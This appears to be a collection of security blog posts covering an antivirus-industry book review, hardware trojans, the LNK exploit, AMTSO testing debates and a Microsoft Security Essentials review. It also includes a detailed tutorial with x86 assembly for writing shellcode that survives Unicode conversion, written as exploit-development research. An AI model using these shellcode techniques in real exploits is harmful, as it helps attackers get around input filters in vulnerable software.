REVIEW: “The Myths of Security”, John Viega

BKMTHSEC.RVW   20091221

“The Myths of Security”, John Viega, 2009, 978-0-596-52302-2, U$29.99/C$37.99
%A   John Viega
%C   103 Morris Street, Suite A, Sebastopol, CA   95472
%D   2009
%G   978-0-596-52302-2 0-596-52302-5
%I   O’Reilly & Associates, Inc.
%O   U$29.99/C$37.99 800-998-9938 fax: 707-829-0104
%O   Audience i Tech 1 Writing 1 (see revfaq.htm for explanation)
%P   238 p.
%T   “The Myths of Security”

The foreword states that McAfee does a much, much better job of security than other companies.  The preface states that computer security is difficult, that people, particularly computer users, are uninformed about computer security, and that McAfee does a much better job of security than other companies.  The author also notes that it is much more fun to write a book that is simply a collection of your opinions than one which requires work and technical accuracy.

There are forty-eight “chapters” in the book, most only two or three pages long.  As you read through them, you will start to notice that they are not about information security in general, but concentrate very heavily on the antivirus (AV) field.

After an initial point that most technology has a poor user interface, a few more essays list some online dangers.  Viega goes on to note a number of security tools which he himself does not use.  He then argues unconvincingly that free antivirus software is not a good
thing, unclearly that Google is evil, and incompletely that AV software doesn’t work.  (I’ve been working in the antivirus research field for a lot longer than the author, and I’m certainly very aware that there are problems with all forms of AV: but there are more forms of AV in heaven and earth than are dreamt of in his philosophy.  By the way, John, Fred Cohen listed all the major forms of AV technology more than twenty-*five* years ago.)  The author subsequently jumps from this careless technical assessment to a very deeply technical discussion of the type of hashing or searching algorithms that AV companies should be using.  And thence to semi-technical (but highly opinionated) pieces on how disclosure, or HTTPS, or CAPTCHA, or VPNs have potential problems and therefore should be destroyed.  Eventually all pretence at analysis runs out, and some of the items dwindle down to three or four paragraphs of feelings.

For those with extensive backgrounds in the security field, this work might have value.  Not that you’ll learn anything, but the biases presented may run counter to your own, and provide a foil against which to test your own positions.  However, those who are not professionals in the field might do well to avoid it, lest they become mythinformed.

copyright Robert M. Slade, 2009    BKMTHSEC.RVW   20091221


Reflections on Trusting Trust goes hardware

A recent Scientific American article does point out that it is getting increasingly difficult to keep our Trusted Computing Base sufficiently small.

For further information on this scenario, see:  [1]

We actually discussed this in the early days of virus research, and sporadically since.  The random aspect (see Dell’s problems with bad chips; the stories about malware on the boards were overblown, since the malware was simply stored in unused memory, rather than being in the BIOS or other boot ROM) is definitely a problem, but a deliberate attack is problematic.  The issue lies with hundreds of thousands of hobbyists (as well as some of the hackers) who poke and prod at everything.  True, the chance of discovering the attack is random, but so is the chance of keeping the attack undetected.  It isn’t something that an attacker could rely upon.

Yes, these days there are thousands of components, being manufactured by hundreds of vendors.  However, there are various factors that need to be considered.

First of all, somebody has to make it.  Most major chips, like CPUs, are a combined effort.  Nobody would be able to make and manufacture a major chip all by themselves.  And, in these days of tight margins and using every available scrap of chip “real estate,” someone would be bound to notice a section of the chip labeled “this space intentionally left blank.”  The more people who are involved, the more likely someone is going to spill the beans, at the very least about an anomaly on the chip, whether or not they knew what it did.  (Once the word is out that there is an anomaly, the lifespan of that secret is probably about three weeks.)

Secondly, there is the issue of the payload.  What can you make it do?  Remember, we are talking components, here.  This means that, in order to make it do anything, you are generally going to have to rely on whatever else is in the device or system in which your chip has been embedded.  You cannot assume that you will have access to communications, memory, disk space, or pretty much anything else, unless you are on the CPU.  Even if you are on the CPU, you are going to be limited.  Do you know what you are?  Are you a computer?  Smartphone?  iPod?  (If the last, you are out of luck, unless you want to try and drive the user slowly insane by refusing to play anything except Barry Manilow.)  If you are a computer, do you know what operating system you are running?  Do you know the format of any disk connected to you?  The more you have to know how to deal with, the more programming has to be built into you, and remember that real estate limitation.  Even if all you are going to do is shut down, you have to have access to communications, and you have to a) be able to see all the traffic, and b) watch all of it without degrading performance while doing so.  (OK, true, it could just be a timer.  That doesn’t allow the attacker a lot of control.)

Next, you have to get people to use your chips.  That means that your chips have to be as cheap as, or cheaper than, the competition.  And remember, you have to use up chip real estate in order to have your payload on the chip.  That means that, for every 1% of chip space you use up for your programming, you lose 1% of manufacturing capacity.  So you have to have deep pockets to fund this.  Your chip also has to be at least as capable as the competition.  It also has to be as reliable as the competition.  You have to test that the payload you’ve put in place does not adversely affect performance, until you tell it to.  And you have to test it in a variety of situations and applications.  All the while making sure nobody finds out your little secret.

Next, you have to trigger your attack.  The trigger can’t be something that could just happen randomly.  And remember, traffic on the Internet, particularly with people streaming videos out there, can be pretty random.  Also remember that there are hundreds of thousands of kids out there with nothing better to do than try to use their computers, smartphones, music players, radio controlled cars, and blenders in exactly the way they aren’t supposed to.  And several thousand who, as soon as something odd happens, start trying to figure out why.

Bad hardware definitely is a threat.  But the largest part of that threat is simply the fact that cheap manufacturers are taking shortcuts and building unreliable components.  If I were an attacker, I could definitely find easier ways to mess up the infrastructure than trying to create attack chips.

[1] Get it some night when you can borrow it, for free, from your local library DVD collection.  On an evening when you don’t want to think too much.  Or at all.  WARNING: contains jokes that six year olds, and most guys, find funny.


Microsoft LNK exploit

The recently discovered LNK exploit (using the way Microsoft parses link or shortcut icons for display in order to get something else executed) may be a tempest in a teapot.  It is technically sophisticated, but so far we don’t appear to have seen it used widely.

Probably a good thing.

This exploit could be used in a wide variety of ways.  You can use it on removable media, so that any time you shove a CD into a drive, or connect a USB stick/thumb drive (or any other USB device, for that matter) to a computer, it results in an infection or some malicious payload.

And remember that OLE stands for object *LINKING* and embedding.  Since it is trivially easy to embed a virus in any Windows OLE format data file, it should be just as easy to create malicious links in any such files.

Microsoft’s own information on the issue seems to indicate that there is a related, but separate, issue with Microsoft Office components, related to Web based activities.  (By the way, when accessing that site, the information about how to protect against the exploit is hidden under the “Workarounds” link, rather than being explicit on the page.)

Some of the potential effects are discussed by Randy Abrams at


Conspiracy Theory

After a while (about 20 years in my case) around the anti-malware industry (the last couple of years actually in it…), you get used to the idea that everyone expects the worst of them… errrr, us:

  • hype and extreme marketing
  • FUD
  • incompetence
  • putting our bottom line above the public well-being
  • bad hygiene

Maybe the last one is a bit paranoid.

Still, we have a bad rep. And the popular myth that AV companies run AMTSO (the Anti-Malware Testing Standards Organization) purely for their own aggrandizement and marketing advantage has some of its origins in that universal mistrust of AV.

If you buy into all that, then you’ll also assume that when five AV researchers, all from different companies, collaborate on a blog that responds to the recent attacks on AMTSO, that’s proof of a conspiracy.

Actually, the AV industry is founded in co-operation: otherwise, your AV product would only ever catch the malware that company had seen in its own honeynets, been sent in by its customers, and so on. But apparently that’s a sign of bad intentions, too.

Whatever. If you’re interested in the blog, here are five places you should be able to find it.

(And for a somewhat related commentary,

Not speaking for AMTSO or the AV industry, and definitely not speaking for the testing industry or the media.


AMTSO Inside and Outside

God bless Twitter.

A day or two ago, I was edified by the sight of two journalists asking each other whether AMTSO (the Anti-Malware Testing Standards Organization) had actually achieved anything yet. Though one of them did suggest that the other might ask me. (Didn’t happen.)

Well, it’s always a privilege to see cutting edge investigative journalism in action. I know the word researcher is in my job title, but I normally charge for doing other people’s research. But since you’re obviously both very busy, and as a member of the AMTSO Board of Directors (NB, that’s a volunteer role) I guess I do have some insight here, so let me help you out, guys.

Since the first formal meeting of AMTSO in May 2008, where a whole bunch of testers, vendors, publishers and individuals sat down to discuss how the general standard of testing could be raised, the organization has approved and published a number of guidelines/best practices documents.

To be more specific:

The “Fundamental Principles of Testing” document is a decent attempt at doing what it says on the tin, and provides a baseline definition of what good testing is at an abstract level.

The Guidelines documents provide… errrr, guidelines… in a number of areas:

  • Dynamic Testing
  • Sample Validation
  • In the Cloud Testing
  • Network Based Product Testing
  • Whole Product Testing
  • Performance Testing

Another document looks at the pros and cons of creating malware for testing purposes.

The analysis of reviews document provides a basis for the review analysis process, which has so far resulted in two review analyses – well, that was a fairly painful gestation process, and in fact there was a volatile but necessary period in the first year in particular, while various procedures, legal requirements and so on were addressed. There are several other papers being worked on.

A fairly comprehensive links/files repository for testing-related resources was established here and new resources added, from AMTSO members and others.

Unspectacular, and no doubt journalistically uninteresting. But representing a lot of volunteer work by people who already have full time jobs.

You don’t have to agree with every sentence of every document: the point is that these documents didn’t exist before, and they go some way towards meeting the needs of those people who want to know more about testing, whether as a tester, tester’s audience, producer of products under test, or any other interested party. Perhaps most importantly, the idea has started to spread that perhaps testers should be accountable to their customers (those who read their reviews) for the accuracy and fitness for purpose of their tests, just as security vendors are accountable to their own customers.

[Perhaps I’d better clarify that: I’m not saying that tests have to be, or can be, perfect, any more than products can be. (You might want 100% security or 100% accuracy, but that isn’t possible.)]

You don’t have to like what AMTSO does. But it would be nice if you’d actually make an effort to find out what we do and maybe even consider joining (AMTSO does not only admit vendors and testers) before you moan into extinction an organization that is trying to do something about a serious problem that no-one else is addressing.

Not speaking for AMTSO


Examining malware will be illegal in Canada

We’ve got a new law coming up in Canada: C-32, otherwise known as DMCA-lite.

Lemme quote you a section:

29.22 (1) It is not an infringement of copyright for an individual to reproduce a work or other subject-matter or any substantial part of a work or other subject-matter if
(c) the individual, in order to make the reproduction, did not circumvent, as defined in section 41, a technological protection measure, as defined in that section, or cause one to be circumvented.

Now, of course, if you want to examine a virus, or other malware, you have to make a copy, right?  So, if the virus writer has obfuscated the code, say by doing a little simple encryption, obviously he was trying to use a “technological protection measure, as defined in that section,” right?  So, decrypting the file is illegal.

Of course, it’s been illegal in the US for some years, now …


KHOBE: Say hello to my little friend(*)

Guess what? Your personal firewall/IDS/Anti Virus/(insert next month’s buzzword here) isn’t going to save you from an attacker successfully executing code remotely on your machine:

So no, it’s not the doomsday weapon, but definitely worthy of the Scarface quote in the title.
This isn’t surprising: researchers find ways to bypass security defenses almost as soon as those defenses are implemented (remember the non-executable stack?). Eliminating vulnerabilities in the first place is the way to go, guys, not trying to block attacks while hoping your ‘shields’ hold up.

(*) If you’re reading this out loud, you need to do so in a thick Cuban accent.


The complexity of the end-user’s computer

Over the years I’ve had to learn a lot about computers.  I’ve written device drivers for the All-in-One system under VAX/VMS.  I know what to do with MS-DOS’s AUTOEXEC.BAT and CONFIG.SYS files.  I’ve learned more word processors than I can remember the names of.  I was using UNIX when that was still a big deal.  Because of some research that was important in the early days of computer viruses, I know a question that will stump any computer forensics expert on the witness stand.

I’m a little afraid of my new netbook.  Within a few months I’ll need to buy a new desktop, and I know I’m going to be more afraid of it.

In the DOS days, I knew pretty much everything that was going on in it.  I knew the hardware, and the system files.  I even had a bunch of tools that would let me see the raw disk and memory.  It was tedious to do so, but it was possible.

Even when Windows 3 and 95 came out, I understood that this was simply a new interface.  I could still examine the system, and make sure everything was as it should be.  I could have confidence and assurance in the computer.  True, there wasn’t any serious protection on it, but, since I knew the full system, I could examine it regularly and make sure that nothing untoward was happening.

Then came Windows NT.  Extra protection on the system, but suddenly every time you turned the system on, 400 files (a number of them system files) got modified.  Change detection lost its security.

Then the later members of that family started adding ties into applications and back again.  And with Windows XP, for the first time, when a friend’s computer got infected, the only solution was to re-install the system.

Complexity is the enemy of security.   However, this goes deeper.  These days we have huge numbers of people using devices that are, as far as they are concerned, magic.  Don’t get me wrong.  I think magic is a lot of fun.  It’s just that magic seems to be defined as inherently unknowable, and these users are not only content with, but actually proud of, their ignorance.

This is dangerous.  When you assume that you cannot know, that seems to absolve you of any responsibility for even trying.  You punch the icons, and do things with no understanding of the consequences.

At the moment, I am trying to set up an ad-hoc wireless network between some of my machines.  I’m not having much luck.  I’ve researched the process, and had suggestions from friends.  I’ve been working at it, off and on, for months.  It still isn’t working.  I can’t find the information I need, either on the process, or in regard to the actual settings on my machines.

Ignorance isn’t bliss.  It’s dangerous.  If I, as a computer, communications, and security specialist of decades of standing, can’t get a simple (well, not quite that simple) network set up, how can we give advice to the novice users of the world on how to keep themselves safe?


Microsoft Security Essentials review (part 2)

My initial, and superficial, review of MSE is still sparking all kinds of comment.

Today it decided to update itself.  Didn’t ask, of course.  It just tied up the computer for about half an hour.  I was able to get some stuff done, as long as I was willing to wait ridiculous amounts of time for responses.


ASCII gone bad / Zer0-overflow

This post is a follow-up to my previous post on KISS shellcoding and exploitation. Like before, this is part of the job I do for SecuriTeam’s SSD. For those not aware of the project, its aim is to give researchers compensation for their research efforts; compensation, of course, being money, not just fame and glory :)
The most common and classic shellcode character restriction is “zero tolerance”: no null bytes at all. This can be solved with a variety of different methods, ranging from substitution to polymorphic escape decoders. Solving zero-tolerance is a very useful and thought-provoking problem, but provides a limited amount of fun :), especially once a basic set of solutions has been developed.

Let’s have a look at a slightly more challenging problem – can we write shellcode that contains a null char at every other byte, and *only* at every other byte? E.g. s\x00h\x00e\x00l\x00l\x00c\x00o\x00d\x00e\x00

This can happen if our shellcode were to pass through a call to MultiByteToWideChar() or similar function. This is often encountered in browser bugs (especially DOM and/or scripting).
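For concreteness, the restriction can be expressed as a quick predicate. This is just my own illustrative Python sketch (the function name is mine), not part of any exploitation toolchain:

```python
def is_compliant(sc: bytes) -> bool:
    """True if every odd offset is 0x00 and every even offset is non-null."""
    return all(
        (b == 0) if i % 2 == 1 else (b != 0)
        for i, b in enumerate(sc)
    )

print(is_compliant(b"s\x00h\x00e\x00l\x00l\x00"))  # True
print(is_compliant(b"shell"))                      # False: adjacent non-nulls
```

Every candidate instruction sequence below has to keep this invariant over the whole byte stream, which is why the glue blocks discussed later matter.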

Some work has been done on this subject: notably, a method described by NGS researcher Chris Anley, coined “Venetian Blinds” or “The Venetian exploit”. The method I suggest here is similar, but slightly different, in that it does not make as many assumptions and presents a more theoretical approach. This work is an original, unrelated effort.

Let us get to it.

Enumerating the methods we can use to write ugly ascii-to-unicode shellcode, we find many are similar to regular zero-tolerance or ascii shellcode methods.

We can decode in-place, copy, or byte-substitute. These methods will become clearer as you read. In some cases it will be necessary to find eip/getPC.

This can also be done in several ways, similar to those shown in my previous post, but different (try encoding FSTENV with null bytes – email me if you succeed :)

It will take many pages to thoroughly cover all of these methods and so I’ll start with the simplest copy method.

Instead of just presenting the final result, I will walk through my thought process working on this. In this post I present several different trials at shellcode, some of which are not immediately useful. This will allow you to better understand the intricacies of shellcode restrictions, and get a feel for the different problems I faced.

Let’s copy our code somewhere. If we were to decode in-place, we would essentially write the same code, as well as extra getPC code.

Not as easy as it sounds. Let’s start by building restriction-compliant basic blocks which can be used later. These blocks shall suffice:
1) set register
2) string operation
3) branch
4) glue block

These translate to:

1) mov reg32, imm32
2) mov [reg32],imm8
inc reg32 # imm8 !=0
3) jmp/call reg32
4) a “glue block” that can be used between every two blocks, and between any two compliant opcodes. This is a compliant block that starts and ends with a null byte. We’ll mark it *GB.

If we want to get a bit fancier, we may also need:

5) pop reg32
6) mov [reg32],imm16 # imm16 bytes not equal 0
inc reg32
inc reg32

(U) basic block number one: setting a register – attempt 1.0
The following opcode:
mov ecx, 0x11223344
encodes like this:
B9 44332211

which of course is not very helpful to us. The best we can do with our restriction and this basic opcode is:
B9 00330011 == mov ecx, 0x11003300
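To see why only immediates of that shape survive, note that the immediate is stored little-endian after the B9 opcode byte. A small Python sketch (helper names are my own, and the compliance rule is the every-other-byte-null restriction stated earlier):

```python
import struct

def encode_mov_ecx(imm: int) -> bytes:
    # mov ecx, imm32 encodes as B9 followed by the immediate, little-endian
    return b"\xb9" + struct.pack("<I", imm)

def is_compliant(sc: bytes) -> bool:
    return all((b == 0) if i % 2 else (b != 0) for i, b in enumerate(sc))

print(encode_mov_ecx(0x11223344).hex())          # b944332211
print(is_compliant(encode_mov_ecx(0x11223344)))  # False
print(is_compliant(encode_mov_ecx(0x11003300)))  # True
```

So a bare mov ecx can only carry immediates whose second and fourth bytes (in memory order) are null, i.e. values of the 0xYY00XX00 form.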

This is not very useful; we want to be able to put an arbitrary value into r32. Let’s divide the problem into two parts, by bytes:

Two lower bytes (“3rd and 4th”): let’s start by setting the two lower bytes. This is easy:

*GB ; zero-out ecx
push 0
pop ecx

mov edx,77007700 – BA 00770077 ; use edx as help-reg

add ch,dh – 00F5
mov edx,66006600 – BA 00660066

add cl,dh – 00F1

This is a good method for the lower bytes. Let’s call it “set(cx, 0x1122)”.

Those readers with a keen eye may notice that assembling these opcodes may not result in compliant shellcode.

This is because different byte sequences may represent the same operation. x86 opcodes are decoded into micro-codes, or μ-codes (with the Greek letter mu). Every μ-code performs a very basic operation, and several of them together make up an “opcode”. Different byte sequences may come to the same end, and therefore be functionally equivalent; usually an assembler will choose the faster one.

Topmost two bytes:
In order to set the topmost byte we can:

mov ecx,66006600 – B9 00660066

In order to set the topmost byte to zero, we can zero out the whole r32, later setting bytes 3 & 4. This is done by replacing our first opcode with the sequence:
push 0 – 6A00
pop ecx – 59


We are now able to set the 1st, 3rd, and 4th bytes of a register. How will we set the second? If the value needed is very low or very high, we could:
set (cx, 0xFFFF)

inc ecx – 41
set (cx, 0xFFFF)


set (cx, 0x0000) ; this is not trivial, but easy
dec ecx – 49
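A quick arithmetic sketch (my own Python, illustrative values only) of the carry/borrow effect these inc/dec pairs rely on:

```python
# With cx == 0xFFFF, inc ecx overflows the low word into byte 2.
ecx = 0x0000FFFF              # set (cx, 0xFFFF)
ecx = (ecx + 1) & 0xFFFFFFFF  # inc ecx
print(hex(ecx))               # 0x10000 -- byte 2 went from 00 to 01, cx is now 0

# Conversely, with cx == 0x0000, dec ecx borrows from byte 2.
ecx = (ecx - 1) & 0xFFFFFFFF  # dec ecx
print(hex(ecx))               # 0xffff -- byte 2 back to 00, cx now FFFF
```

Each inc (or dec) step moves byte 2 by exactly one, at the cost of re-setting cx every time, which is what makes the method so space-hungry.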


This method is not very space-conservative.

And now for something completely different – let’s find a better method. This time the process includes taking a peek at the Intel x86 reference manual (I used the Xeon manual) in search of interesting opcode encodings.

(U) basic block number one: attempt 2.0 – setting the top two bytes.

This time, we’ll try using program memory; specifically, the stack. This may be a good method because many stack operations are single-byte. It may be bad if esp points somewhere unwritable when the shellcode is running (but it can be adapted).

Fun fact – sifting through the Intel reference manual, we can see that the al/ax/eax operand forms provide plenty of compliant opcodes which will not be compliant when other registers are used. E.g.:
MOV DWORD PTR DS:[EBX],110011 – C7 03 11 00 11 00 (not compliant)
MOV DWORD PTR DS:[EAX],110011 – C7 00 11 00 11 00 (compliant)

Now consider the following opcodes:
push 11003300 – 68 00330011
push esp – 54
pop eax – 58
add dword ptr [eax], 00220044 – 8100 44002200
pop ecx – 59

Now ecx == 0x11223344.
This is better than we expected: we have set all four bytes.
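It’s easy to convince yourself of the arithmetic with a two-line check (my own sketch, values taken from the listing above):

```python
pushed = 0x11003300  # immediate of the push: nulls in the compliant positions
added  = 0x00220044  # immediate of the add: nulls in the other positions
result = (pushed + added) & 0xFFFFFFFF
print(hex(result))   # 0x11223344
```

Note the low byte of the sum comes straight from the add’s immediate, which must be non-null, so a target ending in 00 can’t be reached exactly this way.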

We already know how to change the two lowermost bytes if we want to zero them out. We also know how to zero out the 2nd topmost byte, or both high bytes. If we want to get 0x00112233 we can use (I’m omitting opcode encodings from here on):

push 11003300 ; [esp] = 11003300
push 11003300 ; [esp] = 11003300
inc esp ; [esp] = 00110033
pop ecx ; ecx = 00110033
dec esp ; [esp] = 11003300
pop eax ; to restore stack

and then set the missing low bytes. We already know a different way of doing this – look for it.

Thus we have a compact method of performing mov r32,imm32 for any value.
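A minimal simulation of that misaligned-pop trick, modeling the stack as a little-endian byte array (my own Python sketch, not real shellcode):

```python
# esp is just an index into a flat byte array standing in for memory.
mem = bytearray(16)
esp = 16

def push(v):
    global esp
    esp -= 4
    mem[esp:esp + 4] = v.to_bytes(4, "little")

def pop():
    global esp
    v = int.from_bytes(mem[esp:esp + 4], "little")
    esp += 4
    return v

push(0x11003300)
push(0x11003300)
esp += 1              # inc esp: reads are now shifted by one byte
ecx = pop()           # pop ecx
esp -= 1              # dec esp
eax = pop()           # pop eax, to restore the stack
print(hex(ecx))       # 0x110033
print(hex(eax))       # 0x11003300
```

The one-byte misalignment lets a null byte that was in an even position slide into an odd one, which is exactly the degree of freedom the restriction takes away from immediates.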

(U) basic block no. 2: mov [reg32],imm8, inc reg32 # imm8 !=0 – attempt 1.0

First, let’s assume we know what data is present at the copy destination address. In this case, it will be pretty easy to build this BB. We will be using an add operation. Here we are adding 0x90 to the byte at [ecx], and then ecx++ (in this example, the destination byte is assumed to be zero).

mov eax,90009000 ; ah=90
add byte ptr [ecx],ah ; [ecx] += 0x90
inc ecx

This of course will be padded with *GB whenever needed. If we don’t know what data lies at [ecx], we could try this:
push ecx
pop eax ; eax =ecx
mov al, byte ptr [eax] ; al = [ecx]

;negate eax
push 0
pop ebx
add bh,al ; bh =al == [ecx]
xor ebx, ff00ff00
push 0
pop eax
add al,bh ; al = bh == [ecx]^0xff
inc al ; al++ == -(byte ptr [ecx])

;add negated value, and wanted value
mov edx, 11001100
add al,dh
add byte ptr [ecx],al ; [ecx] = [ecx] + (-[ecx] + dh) == dh == 11
inc ecx
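The complement-and-increment in the middle of that listing is ordinary two’s-complement negation; a quick check (my own Python, with an arbitrary stand-in for the unknown byte at [ecx]):

```python
unknown = 0x5A                            # whatever happens to be at [ecx]
neg = ((unknown ^ 0xFF) + 1) & 0xFF       # xor with FF (via bh), then inc al
assert neg == (-unknown) & 0xFF           # i.e. two's-complement negation

wanted = 0x11                             # dh, from mov edx,11001100
final = (unknown + ((neg + wanted) & 0xFF)) & 0xFF
print(hex(final))                         # 0x11 -- the unknown byte cancels out
```

Whatever byte was at [ecx], adding its negation plus the wanted value leaves exactly the wanted value, modulo 256.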

Once again, padded with *GB. This is not very elegant or small, but seems to work nicely. Let’s give it another try, this time using completely different types of opcodes:
push esp
pop edx

inc ecx
inc ecx
inc ecx
inc ecx

push ecx
pop esp

push ebx

push edx
pop esp

This looks nicer.
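What that last sequence is doing becomes clearer in a simulation: esp is temporarily parked just past the destination, so a single push ebx stores four bytes at the old ecx (again my own Python model, not real shellcode):

```python
mem = bytearray(32)                 # pretend address space
esp, ecx, ebx = 24, 4, 0x11223344   # ecx = destination, ebx = payload bytes

edx = esp            # push esp / pop edx: save the real stack pointer
ecx += 4             # inc ecx (x4)
esp = ecx            # push ecx / pop esp: esp now just past the destination
esp -= 4             # push ebx decrements esp ...
mem[esp:esp + 4] = ebx.to_bytes(4, "little")  # ... and writes at [old ecx]
esp = edx            # push edx / pop esp: restore the stack pointer

print(mem[4:8].hex())  # 44332211 (little-endian bytes of ebx)
print(esp)             # 24 -- stack restored
```

Unlike the add-based block, the push stores ebx regardless of what was at the destination, and it writes four bytes at a time, which is why the listing bumps ecx four times first.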

(U) 3) jmp/call reg32
This is easy:
push ecx
ret ; the ret pops our pushed ecx into eip

(U) 4) The star of the evening – our very own Glue Block. We could try this:

or this – after setting the right registers:

ADD BYTE PTR DS:[EAX],CL

(We could probably pull eax off the stack, but we can’t use set(eax,0xADDR), because that requires this very GB in order to work.) There are probably a few others; using them may require us to do minor fixups.

This basically sums up everything we need to build a fancy ascii-to-unicode decoder. Now that we have our 4 basic blocks, we can use them to program, like this: 2-3-4-1-1-1-2-3-4-4. Just kidding. :)

An example of simple Windows code that copies four NOP bytes to [7FFE0300+0x100] looks like this (what we would really be copying is a short code to find the original shellcode and decode it; this is pretty simple, straightforward assembly):

; ecx = 7FFE0401 (one past 7FFE0400; the low byte of ecx cannot be made 00 this way)
68 0004007F PUSH 7F000400
54 PUSH ESP
58 POP EAX
8100 0100FE00 ADD DWORD PTR DS:[EAX],0FE0001
59 POP ECX

;ah = 0x90

B8 00900090 MOV EAX,90009000

;byte ptr [ecx] = 0x90
;ecx ++

0021 ADD BYTE PTR DS:[ECX],AH ; [ecx] = 0x90
41 INC ECX ;ecx++

;byte ptr [ecx] = 0x90
;ecx ++

0021 ADD BYTE PTR DS:[ECX],AH ; [ecx] = 0x90
41 INC ECX ;ecx++

;byte ptr [ecx] = 0×90
;ecx ++


;byte ptr [ecx] = 0×90
;ecx ++


;jmp [ecx-4]




Of course, all the methods I discussed here can be highly optimized (such as using dword-sized writes), and probably some other methods may be used; these are the basics :)

Also, if we want to keep the code-to-shellcode ratio anywhere close to plausible, we will have to be able to write a small number of bytes that can find the original chunk and decode it from our destination address. This can very often be done through use of the register and stack state at the time the shellcode started running. We’re in luck here – pushad is compliant.


Mac Virus update

I know, there ain’t no such thing!

Well, we could have a lively debate on that topic, but not right now.

On this occasion, I’m just letting anyone who wonders what happened to the Mac Virus web site, which I inherited from Susan Lesch some years ago, know what’s happening with it. We have nothing to do with the cobwebby sites at and, or with, whatever that is.

The URL actually redirects to my own Mac page at the Small Blue-Green World site, which now re-redirects to a WordPress page. If you want to go straight to the Mac Virus blog, you can go direct here. It’s still malware-oriented, of course, and is likely to become more rather than less active in that area.

In fact, most of my Small Blue-Green World content now resides on blog pages. ESET content is still blogged at, of course, and AVIEN content is blogged at

Confused? Me too…

We now return you to your normal programming. Scheduling, that is, not coding. Unless that’s what you’re doing at the moment. Oh, never mind.

The next time I blog here, it will be about a proper security issue again. I hope.

Security Author/Consultant at Small Blue-Green World
Chief Operations Officer, AVIEN
ESET Research Fellow & Director of Malware Intelligence

Also blogging at:


A Fairy Tale

Withdrawn on legal advice. Sigh…

So I’m going to ask some hypothetical questions instead.

Principle 3 of the AMTSO (Anti-Malware Testing Standards Organization) guidelines document (—download—amtso-fundamental-principles-of-testing.html) states that “Testing should be reasonably open and transparent.”

The document goes on to explain what information on the test and the test methodology it’s reasonable to ask for.

So is it open and transparent for an anti-malware tester who claims that his tests are compliant with AMTSO guidelines to decline to answer a vendor’s questions or give any information about the reported performance of their product unless they buy a copy of the report or pay a consultancy fee to the tester?

There is, of course, nothing to stop an anti-malware tester soliciting payment from the vendors whose products have been tested both in advance of the test and in response to requests for further information. But is he then entitled to claim to be independent and working without vendor funding? In what respect is this substantially different to the way in which certification testing organizations work, for example?

It seems to me that AMTSO is going to have to consider those questions at its next meeting (in Prague, next week). Purely hypothetically, of course. What do you think?

Small Blue-Green World


Microsoft Security Essentials review

With twenty years’ experience in reviewing AV software, I figured I’d better try it out.

It’s not altogether terrible.  The fact that it’s free, and from Microsoft (and therefore promoted), might reduce the total level of infections, and that would be a good thing.

But even for free software, and from Microsoft, it’s pretty weird.

When I installed it, I did a “quick” scan.

That ran for over an hour on a machine with a drive that’s got about 70 GB of material on it, mostly not programs.  At that point I hadn’t found out that you can exclude directories (more on that later), so it found my zoo.  It deleted nine copies of Sircam.

Lemme tell ya ’bout my zoo.  It’s got over 1500 files in it.  There are a lot of duplicate files (hence the nine copies of Sircam), and there are files in there that are not malware.  There are files which have had the executable file extensions changed.  But there are a great number of common, executable, dangerous pieces of malware in there, and the only thing MSE found was nine copies of Sircam.

(Which it deleted.  Without asking.  Personally, for me, that’s annoying.  It means I have to repopulate my zoo from backups.  But for most users, that’s probably a good thing.)

Now, when I went to repopulate my zoo, I, of course, opened the zoo directory with Windows Explorer.  And all kinds of bells and whistles went off.  As soon as I “looked” at the directory, the real-time component of MSE found more than the quick scan did.  That probably means the real-time scanner is fairly decent.  (In my situation it’s annoying, so I turned it off.  MSE is now annoyed at me, and continues to be annoyed, with big red flags on my task bar.)
MSE has four alert levels to categorize what it finds, and you have some options for setting the default actions.  The levels are severe and high (options: “Recommended action,” “Remove,” and “Quarantine”) and medium and low (which add “Allow” to those options).  Initially, everything is set to “Recommended action.”  I turned everything down to the lowest possible settings: I want information, not strip mining.  However, for most people it would seem reasonable to keep the defaults, which appear to be removal for everything.
I don’t know where it puts the quarantined stuff.  It does have a directory at C:\Documents and Settings\All Users\Application Data\Microsoft Security Essentials, but no quarantined material appears to be there.

(I did try to find out more.  It does have help functions.  If you click on the “Help” button, it sends you to this site.  However, if you click on the link to explain the actions and alert levels, it sends you to this site.  If you examine those two URLs, they are different.  If you click on them, you go to the same place.  At that location, you can get some pages that offer you marketing bumpf, or watch a few videos.  There isn’t much help.)
You can exclude specific files and locations.  Personally, I find that extremely useful, and it is the only reason I’d continue using MSE.  It does seem to work: I excluded my zoo before I did a full scan, and none of my zoo disappeared during the full scan.  However, for most users, the simple existence of that option could signal a loophole.  If I were a blackhat, the first thing I’d do is find out how to exclude myself from the scanner.  (There is also an option to exclude certain file types.)

So I did a full scan.  That took over eight hours.  I don’t know exactly how long, because I finally had to give up and leave it running.  MSE doesn’t report how long a scan took; it only reports what it found.  (I suspect the total run was around ten or eleven hours.  MSE reports that a full scan can take up to an hour.)

While MSE is running it really bogs down the machine.  According to Task Manager it doesn’t take up much in the way of machine cycles, but the computer sure isn’t responsive while it’s on.
When I came back and found it had finished, the first thing it wanted me to do was send a bunch of suspect files to Microsoft.  The files were all from my email.  On the plus side, the files were all messages that reported suspect malware or Websites, so it’s possible that we could say MSE is doing a good job in scanning files and examining archives.  (On the other hand, every single message was from Sunbelt Software.  This could be coincidence, but it is also a fact that Sunbelt makes competing AV software, and was formerly associated with a company that Microsoft bought in its race to produce AV and anti-spyware components.)

Then I started to go through what Microsoft said it found, in order to determine what I had lost.

The first item on the list was rated severe.  Apparently I had failed to notice six copies of the EICAR test file on my machine.

Excuse me?  The EICAR test file?  A severe threat?  Microsoft, you have got to be kidding.  And the joke is not funny.

The EICAR test file is a test file.  If anyone doesn’t know what it is, read about it at EICAR, or at Wikipedia if you don’t trust EICAR.  It’s harmless.  Yes, a compatible scanner will report it, but only to show that your scanner is, in fact, working.
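For anyone who wants to check that their own scanner reacts, the test file is trivial to create.  Here is a sketch in Python; the 68-character string is the one published by EICAR for exactly this purpose, and the filename is arbitrary:

```python
# Create the standard EICAR anti-virus test file.  The string below is
# published by EICAR precisely for scanner testing; it is not malware,
# and a compliant scanner flags it only to show that scanning works.
EICAR_STRING = (
    "X5O!P%@AP[4\\PZX54(P^)7CC)7}$"
    "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
)

with open("eicar.com", "w") as f:
    f.write(EICAR_STRING)

print(len(EICAR_STRING))  # the published string is exactly 68 characters
```

An on-access scanner should react the moment the file is written; a sensible product would then tell you it is the EICAR test file, not rate it a “severe” threat.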

It shouldn’t delete or quarantine all copies it finds on the machine.

